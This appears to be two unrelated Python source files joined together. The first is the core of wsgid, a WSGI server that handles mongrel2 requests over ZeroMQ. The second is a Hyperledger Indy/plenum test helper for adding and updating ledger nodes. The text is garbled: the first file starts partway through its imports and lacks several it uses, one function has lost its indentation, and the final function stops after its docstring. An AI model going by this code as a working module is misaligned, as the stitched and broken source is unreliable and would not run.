from glob import glob
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime
# Re-export plugnplay's Plugin base class so wsgid plugins can simply
# subclass wsgid.core.Plugin.
Plugin = plugnplay.Plugin

# Module-wide logger shared by the classes and functions below.
log = logging.getLogger('wsgid')
class StartResponse(object):
    """
    The WSGI start_response callable (PEP-333) bound to a single mongrel2
    request.

    Tracks the response status/headers, decides keep-alive vs. close, applies
    chunked transfer-encoding when no Content-Length is supplied, and lets
    IPostRequestFilter implementors rewrite status/headers/write/finish hooks.
    The actual wire format is delegated to ``server._reply``.
    """
    # __slots__
    def __init__(self, message, server):
        self.headers = []
        self.status = ''
        # True once the WSGI app has invoked this callable
        self.called = False
        # True once the status line + headers were written to mongrel2
        self.headers_sent = False
        self.message = message
        self.server = server
        self.version = message.headers['VERSION']  # this may go away once the environ is built
        # Hooks that post-request filters may replace (see _run_post_filters)
        self._filtered_finish = self._finish
        self._filtered_write = self._reply
        self.chunked = False
        # HTTP/1.1 defaults to keep-alive; earlier versions default to close
        if self.version == 'HTTP/1.1':
            self.should_close = (message.headers.get('connection', '').lower() == 'close')
        else:
            self.should_close = (message.headers.get('connection', '').lower() != 'keep-alive')
        server.log.debug("Should close: %s", self.should_close)

    def __call__(self, status, response_headers, exec_info=None):
        """
        The start_response callable handed to the WSGI application.

        Raises StartResponseCalledTwice on a second call without exc_info;
        re-raises the supplied exception when headers were already sent,
        as required by PEP-333.  Returns the write callable.
        """
        if self.called and not exec_info:
            raise StartResponseCalledTwice()
        if exec_info and self.headers_sent:
            try:
                raise exec_info[0], exec_info[1], exec_info[2]
            finally:
                exec_info = None  # Avoid circular reference (PEP-333)
        self.headers = response_headers
        self.status = status
        self.called = True
        return self.write

    @property
    def log(self):
        # Expose the module-level logger as an instance property
        global log
        return log

    @property
    def has_content_length(self):
        """True when the app supplied a Content-Length header."""
        #content-length generally at the end, so search backwards
        return 'content-length' in (header[0].lower() for header in reversed(self.headers))

    @property
    def supports_chunked(self):
        """
        True when the client can accept chunked transfer-encoding:
        always for HTTP/1.1, otherwise only if a TE header lists 'chunked'.
        """
        if self.version == 'HTTP/1.1':
            return True
        if 'te' in self.message.headers:
            te = self.message.headers['te']
            return ('chunked' in (v.strip().lower() for v in te.split(',')))
        return False

    def finish(self):
        """
        Terminate the response: flush headers if still pending, emit any
        trailer produced by post-request filters, send the final (empty)
        chunk, and close the connection unless keep-alive is in effect.
        """
        if not self.headers_sent:
            self._finalize_headers()
        trailer = self._filtered_finish()
        if trailer:
            self._reply_internal(trailer)
        if self.chunked or not self.headers_sent:
            self._reply_internal("")
        if self.should_close:
            self.close()

    def close(self):
        # An empty, non-chunked body tells mongrel2 to drop the connection
        self.chunked = False
        self._reply_internal("")

    def write(self, body):
        """The write callable returned to the WSGI app (PEP-333)."""
        if not self.headers_sent:
            self._finalize_headers()
        return self._filtered_write(body)

    def _finalize_headers(self):
        """
        Fill in the headers wsgid is responsible for (X-Wsgid, Date,
        Transfer-Encoding / Connection handling) and run the post-request
        filters so they may rewrite the response hooks.
        """
        header_set = frozenset(header.lower() for (header, value) in self.headers)
        if x_wsgid_header_name not in header_set:
            self.headers.append((X_WSGID_HEADER_NAME, __version__))
        if 'date' not in header_set:
            self.headers.append(("Date", format_date_time(mktime(datetime.now().timetuple()))))
        if 'content-length' not in header_set:
            if self.supports_chunked:
                if 'transfer-encoding' not in header_set:
                    self.chunked = True
                    self.headers.append(("Transfer-Encoding", "chunked"))
            else:
                # Without a length or chunking, closing the connection is the
                # only way to delimit the body
                self.should_close = True
        if 'connection' not in header_set:
            if self.version == 'HTTP/1.1':
                if self.should_close:
                    self.headers.append(('Connection', 'close'))
            else:
                if not self.should_close:
                    self.headers.append(('Connection', 'Keep-Alive'))
        else:
            #should set should_close to the value of 'connection' in headers
            pass
        self._run_post_filters(IPostRequestFilter.implementors())

    def _finish(self):
        # Default finish hook: no trailer
        return ""

    def _reply(self, body):
        # Default write hook; None means "nothing to send"
        if body is None:
            return None
        else:
            return self._reply_internal(body)

    def _reply_internal(self, body):
        """
        Constructs a mongrel2 response message
        """
        if self.chunked:
            # Frame the body for chunked encoding: <hex size>\r\n<data>\r\n
            body = "%s\r\n%s\r\n" % (hex(len(body))[2:], body)
        if not self.headers_sent:
            self.headers_sent = True
            return self.server._reply(self.message, self.status, self.headers, body)
        return self.server._reply(self.message, None, None, body)

    def error(self, status):
        """Send an error response; safe to call even after headers were sent."""
        if not self.headers_sent:
            self(status, [], True)
        self.write("")
        self.close()

    def _run_post_filters(self, filters):
        """
        Run post request filters

        This method is separated because the post request filter should return a value that will
        be passed to the next filter in the execution chain
        """
        self.log.debug("Calling PostRequest filters...")
        # Each filter receives the previous filter's outputs; a failing
        # filter is logged and skipped without aborting the chain
        status, headers, write, finish = self.status, self.headers, self._reply, self._finish
        for f in filters:
            try:
                self.log.debug("Calling {0} filter".format(f.__class__.__name__))
                status, headers, write, finish = f.process(self.message, status, headers, write, finish)
            except Exception as e:
                from wsgid.core import log
                log.exception(e)
        self.status = status
        self.headers = headers
        self._filtered_write = write
        self._filtered_finish = finish
class StartResponseCalledTwice(Exception):
    """Raised when the app calls start_response again without exc_info (PEP-333)."""
    pass
def run_command():
    """
    Extract the first command line argument (if it exists)
    and tries to find a ICommand implementor for it.
    If found, run it. If not does nothing.

    Returns True when a command was found and executed, False otherwise.
    """
    implementors = ICommand.implementors()
    if not implementors or len(sys.argv) < 2:
        return False
    cname = sys.argv[1]  # get the command name
    for candidate in implementors:
        if not candidate.name_matches(cname):
            continue
        # Remove the command name, since it's not defined
        # in the parser options
        sys.argv.remove(cname)
        candidate.run(parser.parse_options(use_config=False), command_name=cname)
        return True
    return False
ZMQ_SOCKET_SPEC = re.compile("(?P<proto>inproc|ipc|tcp|pgm|epgm)://(?P<address>.*)$")
TCP_SOCKET_SPEC = re.compile("(?P<adress>.*):(?P<port>[0-9]+)")
def _is_valid_socket(sockspec):
generic_match = ZMQ_SOCKET_SPEC.match(sockspec)
if generic_match:
proto = generic_match.group('proto')
if proto == "tcp":
return TCP_SOCKET_SPEC.match(generic_match.group('address'))
else:
return True
return False
def validate_input_params(app_path=None, recv=None, send=None):
    """
    Validate the basic wsgid startup parameters.

    app_path
        optional filesystem path of the application; must exist if given
    recv / send
        mandatory ZMQ socket specs (see _is_valid_socket)

    Raises Exception with a descriptive message on the first invalid value.
    """
    if app_path and not os.path.exists(app_path):
        raise Exception("path {0} does not exist.\n".format(app_path))
    if not recv or not _is_valid_socket(recv):
        raise Exception("Recv socket is mandatory, value received: {0}\n".format(recv))
    if not send or not _is_valid_socket(send):
        # Fix: error message previously read "Send socker"
        raise Exception("Send socket is mandatory, value received: {0}\n".format(send))
# Response header identifying the wsgid server version (see
# StartResponse._finalize_headers).
X_WSGID_HEADER_NAME = 'X-Wsgid'
# Lower-cased variant used for case-insensitive header membership tests.
x_wsgid_header_name = X_WSGID_HEADER_NAME.lower()
# Pre-formatted raw header line ("Name: value\r\n").
X_WSGID_HEADER = '{header}: {version}\r\n'.format(header=X_WSGID_HEADER_NAME, version=__version__)
class Wsgid(object):
    """
    The wsgid worker loop: pulls mongrel2 request messages from a ZMQ PULL
    socket, runs each request through the configured WSGI application and
    publishes the responses back on a ZMQ PUB socket.
    """
    def __init__(self, app=None, recv=None, send=None):
        self.app = app    # the WSGI application callable
        self.recv = recv  # ZMQ endpoint mongrel2 pushes requests to
        self.send = send  # ZMQ endpoint responses are published on
        self.ctx = zmq.Context()
        self.log = log

    def _setup_zmq_endpoints(self):
        """Connect the PULL (requests) and PUB (responses) sockets."""
        recv_sock = self.ctx.socket(zmq.PULL)
        recv_sock.connect(self.recv)
        self.log.debug("Using PULL socket %s" % self.recv)
        send_sock = self.ctx.socket(zmq.PUB)
        send_sock.connect(self.send)
        self.log.debug("Using PUB socket %s" % self.send)
        return (send_sock, recv_sock)

    def serve(self):
        """
        Start serving requests.
        """
        self.log.debug("Setting up ZMQ endpoints")
        send_sock, recv_sock = self._setup_zmq_endpoints()
        self.send_sock = send_sock
        self.log.info("All set, ready to serve requests...")
        while self._should_serve():
            self.log.debug("Serving requests...")
            m2message = Message(recv_sock.recv())
            self.log.debug("Request arrived... headers={0}".format(m2message.headers))
            if m2message.is_disconnect():
                self.log.debug("Disconnect message received, id=%s" % m2message.client_id)
                continue
            if m2message.is_upload_start():
                # Body will arrive later via an async-upload file; nothing to do yet
                self.log.debug("Starting async upload, file will be at: {0}".format(m2message.async_upload_path))
                continue
            # Call the app and send the response back to mongrel2
            self._call_wsgi_app(m2message)

    def _should_serve(self):
        """
        This method exists just to me mocked in the tests.
        It is simply too unpredictable to mock the True object
        """
        return True

    def _call_wsgi_app(self, m2message):
        """
        Build the WSGI environ for *m2message*, call the app and stream its
        response through a StartResponse instance.  Any exception yields a
        500; async-upload temp files are removed when done.
        """
        start_response = StartResponse(m2message, self)
        environ = self._create_wsgi_environ(m2message.headers, m2message.body)
        upload_path = conf.settings.mongrel2_chroot or '/'
        if m2message.is_upload_done():
            # Large bodies arrive via a file mongrel2 wrote to disk
            self.log.debug("Async upload done, reading from {0}".format(m2message.async_upload_path))
            parts = m2message.async_upload_path.split('/')
            upload_path = os.path.join(upload_path, *parts)
            environ['wsgi.input'] = open(upload_path)
        response = None
        try:
            self.log.debug("Calling PreRequest filters...")
            self._run_simple_filters(IPreRequestFilter.implementors(), self._filter_process_callback, m2message, environ)
            self.log.debug("Waiting for the WSGI app to return...")
            response = self.app(environ, start_response)
            self.log.debug("WSGI app finished running... status={0}, headers={1}".format(start_response.status, start_response.headers))
            if response is None:
                return start_response.finish()
            if not start_response.headers_sent and not start_response.has_content_length:
                #try to guess content-length. Works if the result from the app is [body]
                try:
                    n = len(response)
                except TypeError:
                    pass
                else:
                    if n == 1:
                        data = iter(response).next()
                        start_response.headers.append(('Content-Length', str(len(data))))
                        start_response.write(data)
                        return start_response.finish()
            for data in response:
                start_response.write(data)
            return start_response.finish()
        except Exception, e:
            # Internal Server Error
            self._run_simple_filters(IPostRequestFilter.implementors(), self._filter_exception_callback, m2message, e)
            start_response.error('500 Internal Server Error')
            self.log.exception(e)
        finally:
            # PEP-333: give the app a chance to release resources
            if hasattr(response, 'close'):
                response.close()
            if m2message.is_upload_done():
                self._remove_tmp_file(upload_path)

    def _filter_exception_callback(self, f, *args):
        # Adapter: deliver an exception to a post-request filter
        f.exception(*args)

    def _filter_process_callback(self, f, *args):
        # Adapter: run a pre-request filter's process hook
        return f.process(*args)

    def _run_simple_filters(self, filters, callback, m2message, *filter_args):
        """
        Run pre request filters

        A failing filter is logged and skipped; it never aborts the request.
        """
        for f in filters:
            try:
                self.log.debug("Calling {0} filter".format(f.__class__.__name__))
                callback(f, m2message, *filter_args)
            except Exception as e:
                from wsgid.core import log
                log.exception(e)

    def _remove_tmp_file(self, filepath):
        # Best-effort removal of mongrel2's async-upload temp file
        try:
            os.unlink(filepath)
        except OSError, o:
            self.log.exception(o)

    def _reply(self, message, status, headers, body):
        """
        Assemble and send one mongrel2 response frame:
        ``<uuid> <len(conn_id)>:<conn_id>, [status line + headers] body``.
        Status/headers are only present on the first frame of a response.
        Returns False when the PUB queue is full and the frame was dropped.
        """
        conn_id = message.client_id
        uuid = message.server_id
        body_list = [uuid, " ", str(len(conn_id)), ":", conn_id, ", "]
        if status:
            body_list.append("HTTP/1.1 ")
            body_list.append(status)
            body_list.append("\r\n")
        if headers:
            body_list.extend(("%s: %s\r\n" % items for items in headers))
            body_list.append("\r\n")
        body_list.append(body)
        self.log.debug("Returning to mongrel2")
        data = "".join(body_list)
        self.log.debug("Data: (%d) %s", len(data), data)
        try:
            # NOBLOCK so a wedged subscriber cannot block the worker
            self.send_sock.send(data, flags=zmq.NOBLOCK)
        except zmq.EAGAIN:
            #eat or propogate?
            log.warn("Discarding response to {} due to full send queue".format((uuid,)))
            return False
        return True

    def _create_wsgi_environ(self, json_headers, body=None):
        """
        Creates a complete WSGI environ from the JSON encoded headers
        received from mongrel2.
        @json_headers should be an already parsed JSON string
        """
        environ = {}
        #Not needed
        json_headers.pop('URI', None)
        #First, some fixed values
        environ['wsgi.multithread'] = False
        environ['wsgi.multiprocess'] = True
        environ['wsgi.run_once'] = True
        environ['wsgi.errors'] = sys.stderr
        environ['wsgi.version'] = (1, 0)
        self._set(environ, 'wsgi.url_scheme', json_headers.get('URL_SCHEME', "http"))
        if body:
            environ['wsgi.input'] = StringIO(body)
        else:
            environ['wsgi.input'] = StringIO('')
        self._set(environ, 'REQUEST_METHOD', json_headers.pop('METHOD'))
        self._set(environ, 'SERVER_PROTOCOL', json_headers.pop('VERSION'))
        self._set(environ, 'SCRIPT_NAME', json_headers.pop('PATTERN').rstrip('/'))
        self._set(environ, 'QUERY_STRING', json_headers.pop('QUERY', ""))
        # PATH_INFO is the request path with the mount point (SCRIPT_NAME) stripped
        script_name = environ['SCRIPT_NAME']
        path_info = json_headers.pop('PATH')[len(script_name):]
        self._set(environ, 'PATH_INFO', urllib.unquote(path_info))
        server_port = '80'
        host_header = json_headers.pop('host')
        if ':' in host_header:
            server_name, server_port = host_header.split(':')
        else:
            server_name = host_header
        self._set(environ, 'HTTP_HOST', host_header)
        self._set(environ, 'SERVER_PORT', server_port)
        self._set(environ, 'SERVER_NAME', server_name)
        self._set(environ, 'REMOTE_ADDR', json_headers['x-forwarded-for'])
        self._set(environ, 'CONTENT_TYPE', json_headers.pop('content-type', ''))
        environ['content-type'] = environ['CONTENT_TYPE']
        self._set(environ, 'CONTENT_LENGTH', json_headers.pop('content-length', ''))
        environ['content-length'] = environ['CONTENT_LENGTH']
        #Pass the other headers
        for (header, value) in json_headers.iteritems():
            header = header.replace('-', '_').upper()
            environ['HTTP_%s' % header] = str(value)
        return environ

    def _set(self, environ, key, value):
        """
        Sets a value in the environ object
        """
        environ[key] = str(value)
class WsgidApp(object):
    """
    Represents a wsgid application folder and gives access to the pidfiles
    of its master/worker processes.
    """

    REGEX_PIDFILE = re.compile("[0-9]+\.pid")

    def __init__(self, fullpath):
        self.fullpath = fullpath

    def is_valid(self):
        """True when every folder of the expected app layout exists."""
        required = ('app', 'logs', 'plugins', 'pid', 'pid/master', 'pid/worker')
        return all(os.path.exists(os.path.join(self.fullpath, entry))
                   for entry in required)

    def master_pids(self):
        """Sorted pids found under pid/master/."""
        return sorted(self._get_pids(self.fullpath, 'pid/master/'))

    def worker_pids(self):
        """Sorted pids found under pid/worker/."""
        return sorted(self._get_pids(self.fullpath, 'pid/worker/'))

    @property
    def pluginsdir(self):
        return os.path.join(self.fullpath, 'plugins')

    def _get_pids(self, base_path, pids_path):
        # Collect the numeric prefix of every "<pid>.pid" file in the folder
        pattern = os.path.join(base_path, pids_path, '*.pid')
        found = []
        for pid_file in glob(pattern):
            if self._is_pidfile(pid_file):
                found.append(int(os.path.basename(pid_file).split('.')[0]))
        return found

    def _is_pidfile(self, filename):
        return self.REGEX_PIDFILE.match(os.path.basename(filename))
| |
import json
from indy.did import create_and_store_my_did
from indy.ledger import build_node_request, build_nym_request, \
build_get_txn_request
from indy.pool import refresh_pool_ledger
from plenum.test.node_catchup.helper import waitNodeDataEquality
from stp_core.loop.looper import Looper
from stp_core.types import HA
from typing import Iterable, Union, Callable
from plenum.common.constants import VERKEY, VALIDATOR, STEWARD_STRING
from plenum.common.keygen_utils import initNodeKeysForBothStacks
from plenum.common.signer_simple import SimpleSigner
from plenum.common.util import randomString, hexToFriendly
from plenum.test.helper import sdk_sign_request_objects, \
sdk_send_signed_requests, sdk_json_to_request_object, \
sdk_get_and_check_replies, sdk_sign_request_strings
from plenum.test.node_request.helper import sdk_ensure_pool_functional
from plenum.test.test_node import TestNode, \
ensure_node_disconnected, checkNodesConnected
from stp_core.network.port_dispenser import genHa
from plenum.common.config_helper import PNodeConfigHelper
from stp_core.common.log import getlogger
logger = getlogger()

# NOTE(review): not referenced anywhere in this module's visible code;
# presumably a retry budget for pool refresh used by callers — confirm.
REFRESH_TRY_COUNT = 4
def new_client_request(role, name, looper, sdk_wallet):
    """Create a brand-new DID from a random seed and return a signed NYM request for it."""
    wallet_handle, sender_did = sdk_wallet
    seed = randomString(32)
    named_did, named_verkey = looper.loop.run_until_complete(
        create_and_store_my_did(wallet_handle, json.dumps({'seed': seed})))
    nym_request = looper.loop.run_until_complete(
        build_nym_request(sender_did, named_did, named_verkey, name, role))
    signed = sdk_sign_request_strings(looper, sdk_wallet, [json.loads(nym_request)])
    return signed[0]
def prepare_new_node_data(tconf, tdir, newNodeName, configClass=PNodeConfigHelper):
    """Generate keys and HAs for a new node; returns everything a NODE txn needs."""
    seed = randomString(32).encode()
    node_ha, client_ha = genHa(2)
    helper = configClass(newNodeName, tconf, chroot=tdir)
    pubkey, verkey, bls_key, key_proof = initNodeKeysForBothStacks(
        newNodeName, helper.keys_dir, seed, override=True)
    return (seed, verkey, bls_key, node_ha[0], node_ha[1],
            client_ha[0], client_ha[1], key_proof)
def start_not_added_node(looper,
                         tdir, tconf, allPluginsPath,
                         newNodeName):
    '''
    Creates and starts a new node, but doesn't add it to the Pool
    (so, NODE txn is not sent).
    '''
    sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort, key_proof = \
        prepare_new_node_data(tconf, tdir, newNodeName)
    # NOTE(review): a fresh random seed is passed below instead of the
    # `sigseed` generated above; create_and_start_new_node never uses its
    # sigseed argument, so this appears harmless — confirm before relying
    # on the returned sigseed matching the node's keys.
    new_node = create_and_start_new_node(looper, newNodeName,
                                         tdir, randomString(32).encode(),
                                         (nodeIp, nodePort), (clientIp, clientPort),
                                         tconf, True, allPluginsPath, TestNode)
    return sigseed, bls_key, new_node, (nodeIp, nodePort), \
        (clientIp, clientPort), key_proof
def add_started_node(looper,
                     new_node,
                     node_ha,
                     client_ha,
                     txnPoolNodeSet,
                     sdk_pool_handle,
                     sdk_wallet_steward,
                     bls_key,
                     key_proof):
    '''
    Adds already created node to the pool,
    that is sends NODE txn.
    Makes sure that node is actually added and connected to all other nodes.
    '''
    # A node must be owned by a steward; register a dedicated one first
    new_steward_wallet_handle = sdk_add_new_nym(looper, sdk_pool_handle,
                                                sdk_wallet_steward,
                                                "Steward" + new_node.name,
                                                role=STEWARD_STRING)
    node_name = new_node.name
    node_dest = hexToFriendly(new_node.nodestack.verhex)
    sdk_send_update_node(looper, new_steward_wallet_handle,
                         sdk_pool_handle, node_dest, node_name,
                         node_ha[0], node_ha[1],
                         client_ha[0], client_ha[1],
                         services=[VALIDATOR],
                         bls_key=bls_key,
                         key_proof=key_proof)
    txnPoolNodeSet.append(new_node)
    looper.run(checkNodesConnected(txnPoolNodeSet))
    sdk_pool_refresh(looper, sdk_pool_handle)
    sdk_ensure_pool_functional(looper, txnPoolNodeSet,
                               sdk_wallet_steward,
                               sdk_pool_handle)
    # The new node must catch up to the rest of the pool
    waitNodeDataEquality(looper, new_node, *txnPoolNodeSet[:-1])
def create_and_start_new_node(
        looper,
        node_name,
        tdir,
        sigseed,
        node_ha,
        client_ha,
        tconf,
        auto_start,
        plugin_path,
        nodeClass,
        do_post_node_creation: Callable = None,
        configClass=PNodeConfigHelper):
    """
    Instantiate a node, run the optional post-creation hook and (when
    *auto_start* is truthy) add it to the looper.

    NOTE(review): *sigseed* is accepted but never forwarded — node keys are
    expected to have been initialised beforehand (see prepare_new_node_data).
    """
    node = new_node(node_name=node_name,
                    tdir=tdir,
                    node_ha=node_ha,
                    client_ha=client_ha,
                    tconf=tconf,
                    plugin_path=plugin_path,
                    nodeClass=nodeClass,
                    configClass=configClass)
    if do_post_node_creation:
        do_post_node_creation(node)
    if auto_start:
        looper.add(node)
    return node
def new_node(
        node_name,
        tdir,
        node_ha,
        client_ha,
        tconf,
        plugin_path,
        nodeClass,
        configClass=PNodeConfigHelper):
    """Instantiate (but do not start) a node of *nodeClass* with its own config helper."""
    helper = configClass(node_name, tconf, chroot=tdir)
    return nodeClass(node_name,
                     config_helper=helper,
                     config=tconf,
                     ha=node_ha, cliha=client_ha,
                     pluginPaths=plugin_path)
def sdk_add_new_steward_and_node(looper,
                                 sdk_pool_handle,
                                 sdk_wallet_steward,
                                 new_steward_name,
                                 new_node_name,
                                 tdir,
                                 tconf,
                                 allPluginsPath=None,
                                 autoStart=True,
                                 nodeClass=TestNode,
                                 transformNodeOpFunc=None,
                                 do_post_node_creation: Callable = None,
                                 services=[VALIDATOR],
                                 wait_till_added=True):
    """
    Register a new steward NYM and then add a new node owned by it.

    Returns (new_steward_wallet_handle, new_node).

    NOTE(review): `services=[VALIDATOR]` is a mutable default argument — it
    is only read here, never mutated; `transformNodeOpFunc` is accepted but
    unused in this body.
    """
    new_steward_wallet_handle = sdk_add_new_nym(looper,
                                                sdk_pool_handle,
                                                sdk_wallet_steward,
                                                alias=new_steward_name,
                                                role=STEWARD_STRING)
    new_node = sdk_add_new_node(
        looper,
        sdk_pool_handle,
        new_steward_wallet_handle,
        new_node_name,
        tdir,
        tconf,
        allPluginsPath,
        autoStart=autoStart,
        nodeClass=nodeClass,
        do_post_node_creation=do_post_node_creation,
        services=services,
        wait_till_added=wait_till_added)
    return new_steward_wallet_handle, new_node
def sdk_add_new_nym(looper, sdk_pool_handle, creators_wallet,
                    alias=None, role=None, seed=None,
                    dest=None, verkey=None, skipverkey=False, no_wait=False):
    """
    Add a NYM txn to the ledger on behalf of *creators_wallet*.

    Returns (wallet_handle, new_did), or only the in-flight request couple
    when *no_wait* is True.
    """
    seed = seed or randomString(32)
    alias = alias or randomString(5)
    wh, _ = creators_wallet
    # filling nym request and getting steward did
    # if role == None, we are adding client
    nym_request, new_did = looper.loop.run_until_complete(
        prepare_nym_request(creators_wallet, seed,
                            alias, role, dest, verkey, skipverkey))
    # sending request using 'sdk_' functions
    request_couple = sdk_sign_and_send_prepared_request(looper, creators_wallet,
                                                        sdk_pool_handle, nym_request)
    if no_wait:
        return request_couple
    # waiting for replies
    sdk_get_and_check_replies(looper, [request_couple])
    return wh, new_did
def sdk_add_new_node(looper,
                     sdk_pool_handle,
                     steward_wallet_handle,
                     new_node_name,
                     tdir, tconf,
                     allPluginsPath=None, autoStart=True, nodeClass=TestNode,
                     do_post_node_creation: Callable = None,
                     services=[VALIDATOR],
                     wait_till_added=True):
    """
    Generate keys for a new node, send its NODE txn on behalf of the steward
    and start the node locally.  Returns the started node.

    NOTE(review): `services=[VALIDATOR]` is a mutable default; it is only
    read here, never mutated.
    """
    nodeClass = nodeClass or TestNode
    sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort, key_proof = \
        prepare_new_node_data(tconf, tdir, new_node_name)
    # filling node request
    _, steward_did = steward_wallet_handle
    node_request = looper.loop.run_until_complete(
        prepare_node_request(steward_did,
                             new_node_name=new_node_name,
                             clientIp=clientIp,
                             clientPort=clientPort,
                             nodeIp=nodeIp,
                             nodePort=nodePort,
                             bls_key=bls_key,
                             sigseed=sigseed,
                             services=services,
                             key_proof=key_proof))
    # sending request using 'sdk_' functions
    request_couple = sdk_sign_and_send_prepared_request(looper, steward_wallet_handle,
                                                        sdk_pool_handle, node_request)
    if wait_till_added:
        # waiting for replies
        sdk_get_and_check_replies(looper, [request_couple])
    return create_and_start_new_node(looper, new_node_name, tdir, sigseed,
                                     (nodeIp, nodePort), (clientIp, clientPort),
                                     tconf, autoStart, allPluginsPath,
                                     nodeClass,
                                     do_post_node_creation=do_post_node_creation,
                                     configClass=PNodeConfigHelper)
async def prepare_schema_request(wallet, named_seed, alias, role):
    # TODO(review): unimplemented stub kept for API symmetry with
    # prepare_nym_request; currently returns None.
    pass
async def prepare_nym_request(wallet, named_seed, alias,
                              role, dest=None, verkey=None, skipverkey=False):
    """
    Create a fresh DID from *named_seed* and build a NYM request for it.

    *dest*/*verkey* override the generated values; *skipverkey* omits the
    verkey from the request entirely.  Returns (nym_request, target_did).
    """
    wallet_handle, submitter_did = wallet
    created_did, created_verkey = await create_and_store_my_did(
        wallet_handle, json.dumps({'seed': named_seed}))
    target_did = dest or created_did
    if skipverkey:
        target_verkey = None
    else:
        target_verkey = verkey or created_verkey
    nym_request = await build_nym_request(submitter_did, target_did, target_verkey,
                                          alias, role)
    return nym_request, target_did
async def prepare_node_request(steward_did, new_node_name=None, clientIp=None,
                               clientPort=None, nodeIp=None, nodePort=None, bls_key=None,
                               sigseed=None, destination=None, services=[VALIDATOR],
                               key_proof=None):
    """
    Build a NODE txn request.  Exactly one of *sigseed* (derive the node DID
    from a seed) or *destination* (use an existing node DID) must be given;
    every None field is simply omitted from the txn data.
    """
    if (sigseed is None) == (destination is None):
        raise AttributeError('You should provide only one of: sigseed or destination')
    if sigseed is not None:
        destination = SimpleSigner(seed=sigseed).identifier
    # Insertion order matters for the serialized payload; keep it stable.
    candidate_fields = (('alias', new_node_name),
                        ('client_ip', clientIp),
                        ('client_port', clientPort),
                        ('node_ip', nodeIp),
                        ('node_port', nodePort),
                        ('blskey_pop', key_proof),
                        ('blskey', bls_key),
                        ('services', services))
    data = {}
    for field, value in candidate_fields:
        if value is not None:
            data[field] = value
    return await build_node_request(steward_did, destination, json.dumps(data))
def sdk_sign_and_send_prepared_request(looper, sdk_wallet, sdk_pool_handle, string_req):
    """Sign a JSON-encoded request with *sdk_wallet* and submit it to the pool."""
    request_obj = sdk_json_to_request_object(json.loads(string_req))
    signed = sdk_sign_request_objects(looper, sdk_wallet, [request_obj])
    return sdk_send_signed_requests(sdk_pool_handle, signed)[0]
def sdk_send_update_node(looper, sdk_submitter_wallet,
                         sdk_pool_handle,
                         destination, alias,
                         node_ip, node_port,
                         client_ip, client_port,
                         services=[VALIDATOR],
                         bls_key=None,
                         key_proof=None,
                         pool_refresh=True):
    """
    Send a NODE txn updating the node identified by *destination* and wait
    for the reply.  Pass None for any field that should stay unchanged.
    Returns the ledger reply.
    """
    _, submitter_did = sdk_submitter_wallet
    # filling node request
    node_request = looper.loop.run_until_complete(
        prepare_node_request(submitter_did,
                             new_node_name=alias,
                             clientIp=client_ip,
                             clientPort=client_port,
                             nodeIp=node_ip,
                             nodePort=node_port,
                             bls_key=bls_key,
                             destination=destination,
                             services=services,
                             key_proof=key_proof))
    # sending request using 'sdk_' functions
    request_couple = sdk_sign_and_send_prepared_request(looper, sdk_submitter_wallet,
                                                        sdk_pool_handle, node_request)
    # waiting for replies
    reply = sdk_get_and_check_replies(looper, [request_couple])[0][1]
    if pool_refresh:
        sdk_pool_refresh(looper, sdk_pool_handle)
    return reply
def sdk_pool_refresh(looper, sdk_pool_handle):
    # Re-read the pool ledger so the SDK sees recently added/updated nodes
    looper.loop.run_until_complete(
        refresh_pool_ledger(sdk_pool_handle))
def sdk_build_get_txn_request(looper, steward_did, seq_no):
    """Build a GET_TXN request for *seq_no* (None ledger type = default ledger)."""
    request = looper.loop.run_until_complete(
        build_get_txn_request(steward_did, None, seq_no))
    return request
def update_node_data_and_reconnect(looper, txnPoolNodeSet,
                                   steward_wallet,
                                   sdk_pool_handle,
                                   node,
                                   new_node_ip, new_node_port,
                                   new_client_ip, new_client_port,
                                   tdir, tconf):
    """
    Send a NODE txn updating *node*'s HAs, then restart the node with the
    new addresses and wait for the whole pool to reconnect.

    Any of the new_* arguments may be None to keep the current value.
    Returns the restarted TestNode instance.
    """
    node_ha = node.nodestack.ha
    cli_ha = node.clientstack.ha
    node_dest = hexToFriendly(node.nodestack.verhex)
    sdk_send_update_node(looper, steward_wallet, sdk_pool_handle,
                         node_dest, node.name,
                         new_node_ip, new_node_port,
                         new_client_ip, new_client_port)
    # restart the Node with new HA
    node.stop()
    looper.removeProdable(name=node.name)
    config_helper = PNodeConfigHelper(node.name, tconf, chroot=tdir)
    restartedNode = TestNode(node.name,
                             config_helper=config_helper,
                             config=tconf,
                             ha=HA(new_node_ip or node_ha.host,
                                   new_node_port or node_ha.port),
                             cliha=HA(new_client_ip or cli_ha.host,
                                      new_client_port or cli_ha.port))
    looper.add(restartedNode)
    # replace node in txnPoolNodeSet
    try:
        idx = next(i for i, n in enumerate(txnPoolNodeSet)
                   if n.name == node.name)
    except StopIteration:
        # Fix: message previously read "is not the pool"
        raise Exception('{} is not in the pool'.format(node))
    txnPoolNodeSet[idx] = restartedNode
    looper.run(checkNodesConnected(txnPoolNodeSet))
    sdk_ensure_pool_functional(looper, txnPoolNodeSet,
                               steward_wallet, sdk_pool_handle)
    return restartedNode
def sdk_change_node_keys(looper, node, sdk_wallet_steward, sdk_pool_handle,
                         verkey):
    """
    Rotate *node*'s verkey on the ledger, then wipe the node's local key
    stores so both stacks regenerate their role keys.
    """
    _, steward_did = sdk_wallet_steward
    node_dest = hexToFriendly(node.nodestack.verhex)
    node_request = looper.loop.run_until_complete(
        prepare_node_request(steward_did,
                             new_node_name=node.name,
                             destination=node_dest))
    # prepare_node_request has no verkey parameter; patch it into the raw txn
    request_json = json.loads(node_request)
    request_json['operation'][VERKEY] = verkey
    node_request1 = json.dumps(request_json)
    request_couple = sdk_sign_and_send_prepared_request(looper, sdk_wallet_steward,
                                                        sdk_pool_handle, node_request1)
    sdk_get_and_check_replies(looper, [request_couple])
    # Drop all cached role keys/dirs for both the node and client stacks
    node.nodestack.clearLocalRoleKeep()
    node.nodestack.clearRemoteRoleKeeps()
    node.nodestack.clearAllDir()
    node.clientstack.clearLocalRoleKeep()
    node.clientstack.clearRemoteRoleKeeps()
    node.clientstack.clearAllDir()
def demote_node(looper, steward_wallet, sdk_pool_handle,
                node):
    """Demote *node* by sending a NODE txn with an empty services list."""
    dest = hexToFriendly(node.nodestack.verhex)
    sdk_send_update_node(looper, steward_wallet,
                         sdk_pool_handle, dest, node.name,
                         None, None, None, None,
                         services=[])
def promote_node(looper, steward_wallet, sdk_pool_handle,
                 node):
    """Promote *node* back to validator via a NODE txn with services=[VALIDATOR]."""
